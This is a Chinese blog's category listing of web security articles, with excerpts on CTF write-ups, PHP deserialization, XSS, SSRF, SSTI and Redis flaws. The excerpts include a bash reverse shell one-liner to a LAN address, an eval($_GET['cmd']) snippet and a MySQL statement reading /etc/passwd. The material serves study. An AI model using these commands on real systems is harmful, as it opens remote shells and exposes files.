![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全
文章平均质量分 92
BerL1n
网安web
展开
-
一道构造pop链的反序列化题
最近在回顾php反序列化知识时遇到了一道题,感觉知识点挺多的,可以全面复习下反序列化。原创 2022-10-01 17:01:26 · 700 阅读 · 0 评论 -
EIS高校运维赛WP
WEBezbypasshttp://111.186.57.61:10101/<?phpif(isset($_GET['src'])){ highlight_file(__FILE__);}eval($_GET['cmd']);很明显eval命令执行,但是不可能这么容易,看了下phpinfo,果然ban了很多函数disable_functions : pcntl...原创 2021-01-27 12:37:09 · 639 阅读 · 1 评论 -
Linux下几种常见的反弹shell的方式
time:2019-04-11 21:07最近在做ctf题时碰到一些命令执行题借用命令执行来反弹shell,这里记录一下。1.bash反弹shell个人感觉bash反弹是最简单、也是最常见的一种。bash -i >& /dev/tcp/192.168.20.151/8080 0>&1bash一句话命令详解以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下。其实以上bash反弹一句完整的解读过程就是:bash产生了一个交互环境与本地主机主动发起与目标原创 2021-01-27 12:35:14 · 1758 阅读 · 1 评论 -
php反序列化拓展攻击详解
2019-11-11 16:51文章首发于先知社区:https://xz.aliyun.com/t/6699前言继上篇对thinkphp5版本反序列化pop链详细分析后,对tp的反序列化漏洞有了初步了解,但是其实无论挖掘的pop链有多么的完美,最终还是避免不了要有关键的触发点,否则将一无是处,比如常见的就是反序列化函数 unserialize() ,绝大多数都是靠unserialize函数,反序列化对象触发漏洞。但是在tp框架或者其他框架以及后期开发越来越安全的情况下我们很难再找到这样的触发点。最近也原创 2021-01-27 12:29:48 · 845 阅读 · 0 评论 -
php反序列化漏洞
2019-05-12 21:50php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。为了理解这个漏洞,请读者具备基础的php知识。类和变量是非常容易理解的php概念。这里先来了解一下什么是php序列化与反序列化?序列化:函数 : serialize()把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。反序列化:函数: unserialize()恢复原先被序列化原创 2021-01-27 12:28:47 · 269 阅读 · 0 评论 -
PHPsession反序列化漏洞
111原创 2021-01-27 12:26:11 · 639 阅读 · 0 评论 -
CSS注入窃取token
关于css注入是头一次看到,这里参考各师傅学习一下。窃取input标签中的token假设我们有一个php页面<?php$token1 = md5($_SERVER['HTTP_USER_AGENT']);$token2 = md5($token1);?><!doctype html><meta charset=utf-8><input ty...原创 2021-01-27 12:25:14 · 972 阅读 · 0 评论 -
渗透测试作业
Raven:靶机下载:https://pan.baidu.com/s/18p0Jir7eH0BL1Na_6ybRtgip地址扫描利用kali下arp-scan -l扫出ip服务器,这也不知道账号密码,所以无法确定其Ip地址,因为处于vm中和其他虚拟机一个段,扫描存活主机。发现有四台存活主机,尝试发现192.168.198.137是改网站ip。还可以用nmap去扫描端口扫描可...原创 2020-12-29 14:33:08 · 432 阅读 · 0 评论 -
Drupal远程命令执行漏洞复现
time: 2019-05-12 21:46漏洞描述Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。漏洞检测针对该漏洞,可采用两种方法进行检测:方法一:登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞;方法二:在Drupal根目录下找到文件/core/lib/Drupal/Com原创 2020-12-29 14:25:42 · 767 阅读 · 2 评论 -
Metinfo 6.1.3 XSS漏洞分析
time: 2019-04-11 21:11文章首发于安全客,Metinfo 6.1.3 XSS漏洞分析前言前段时间看到一个cms造成的xss漏洞,这里想分析下。这个漏洞是metinfo6.1.3版本因参数问题造成前台和后台引起了两处xss漏洞。这个漏洞的影响范围一直到最新版本(6.1.3),因为前段时间爆出的漏洞,所以新版本应该已修复。cms最新6.13下载地址:https://www.mituo.cn/download/前台漏洞分析( CVE-2018-20486)通过在前台插入xss..原创 2020-12-29 14:22:46 · 593 阅读 · 0 评论 -
XSS与字符编码及浏览器解析原理
time: 2019-05-12 21:27XSS与字符编码基本介绍:提起XSS 想到的就是插入字符字符编码与各种解析了!现在介绍一下在xss中最经常用到的编码html实体编码(10进制与16进制):如把尖括号编码[ < ] -----> html十进制: < html十六进制: c;javascript的八进制跟十六进制:如把尖括号编码[ < ] -----> js八进制: \74 js十六进制: \x3cjsunicode编码:原创 2020-12-29 14:15:09 · 1420 阅读 · 0 评论 -
XSS攻击
time: 2019-05-12 21:23XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。什么是XSS攻击?XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制—..原创 2020-12-29 14:06:47 · 360 阅读 · 0 评论 -
记一次sql注入题目
前言前几天在做上海赛中碰到一道sql注入题,很简单的一道题,过滤的也都fuzz出来了,绕过方法也找到了,还是没做出来,因为不能有单引号,一出现单引号就404,fuzz到其他敏感字都是提示禁用的,就是单引号会404,赛后看payload也是有单引号的,emmm…可能还是自己payload没写好吧。。原谅注入学的最菜的我,这里小记一下吧。例题通过一道题目记下思路和过程。题目输入内容,然后可以...原创 2019-11-25 16:55:39 · 348 阅读 · 0 评论 -
java反序列化漏洞学习
前言在学习java的过程中,了解java中常见的安全漏洞,本文记录了java反序列化漏洞的学习。基本概念什么是java序列化和反序列化?Java 序列化(Serialization)是指把Java对象保存为二进制字节码的过程,是把 Java 对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。J...原创 2019-11-25 16:53:02 · 379 阅读 · 0 评论 -
SSRF利用 Gopher 协议拓展攻击面
1 概述Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。gopher:gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...原创 2019-11-25 16:50:55 · 9797 阅读 · 0 评论 -
thinkphp5.1.x~5.2.x版本反序列化链挖掘分析
前言之前看到关于thinkphp5反序列化链的分析以及不久前做的各大ctf赛题中都考到了反序列化链挖掘并利用的题目,之前未进行分析,这里参考各位师傅的文章进行分析一下。。5.1.x版本分析thinkphp5.1版本反序列化漏洞在今年七月份爆出。环境thinkphp 5.1php 7.2漏洞挖掘思路挖掘反序列化漏洞过程中,很多时候都是利用php中的魔术方法触发反序列化漏洞。但如果漏洞...原创 2019-11-11 16:47:22 · 1520 阅读 · 0 评论 -
JavaScript原型链污染攻击
在理解攻击方法之前先了解一下js的面向对象编程的特点。由于js非常面向对象的编程特性,js有很多神奇的操作。在js中你可以用各种方式操作自己的对象。0x01 prototype和__proto__分别是什么?JavaScript中,我们如果要定义一个类,需要以定义“构造函数”的方式来定义:function Foo() { this.bar = 1}new Foo()...转载 2019-07-18 16:00:02 · 7177 阅读 · 0 评论 -
一道ctf题关于php反序列化字符逃逸
2019强网杯easy_sql这题知识点堆叠注入;以前还未遇到过这是过滤掉的内容,因此常见的注入方式我们是不能再使用了。然后提交试试。发现似乎是直接把返回的原始数据给返回了。3.然后来测试一下有没有注入,似乎是有的。/?inject=1%27or+%271%27%3D%271 /?inject=1’ or ‘1’='14.来检查一下过滤情况,过滤函数如下。过滤了 select,u...原创 2019-07-18 17:21:23 · 2369 阅读 · 0 评论 -
moctf部分web-wp
没时间解释了点进题目发现是index2.php,想到302跳转,burp查看会出现提示访问uploadsomething.php页面写入文件会显示出文件地址,但是当去访问它的时候,会显示Too slow!猜测服务器会自动删除文件,但是文件在上传至服务器和被删除这中间有微小的时间间隔。题目考察的应该是条件竞争,一边利用burp不断发包,另一边不断去读取文件地址。import reques...原创 2019-07-22 19:06:35 · 492 阅读 · 0 评论 -
mysql任意文件读取漏洞学习
前言最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile '/etc/passwd' into table proc;,从而可以导致mys...原创 2019-09-13 13:54:46 · 3692 阅读 · 5 评论 -
PHP绕过disable_function限制
前言之前对php中的这个disable_function没什么了解,不过通过国赛决赛中的一道题引起了注意,因为在对基本上所有的shell命令禁用之后必须想办法突破disable_function才行,这里学习几种突破disable_function的方法。LD_PRELOAD环境变量突破LD_PRELOAD是Linux系统的下一个有趣的环境变量:“它允许你定义在程序运行前优先加载的动态链接库...原创 2019-09-24 15:33:01 · 4923 阅读 · 2 评论 -
简单理解Flask Jinja2服务端模板注入(SSTI)
对于表示层,Flask利用Jinga2引擎,其使用方便,自动转义.html,htm,xml以及.xhtml文件中的内容。Flask允许在Python源代码中使用HTML字符串创建模版,Flask内部使用本地线程对象,这样就可以不用为了线程安全的缘故在同一个请求中在函数之间传递对象。服务端模版注入Flask框架中提供的模版引擎可能会被一些无量开发者利用引入一个服务端模版注入漏洞,如果对此感到有些...原创 2019-09-24 15:38:04 · 683 阅读 · 0 评论 -
Redis未授权访问漏洞
1.应用介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。2. 漏洞介绍Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务...原创 2019-07-13 10:37:16 · 850 阅读 · 0 评论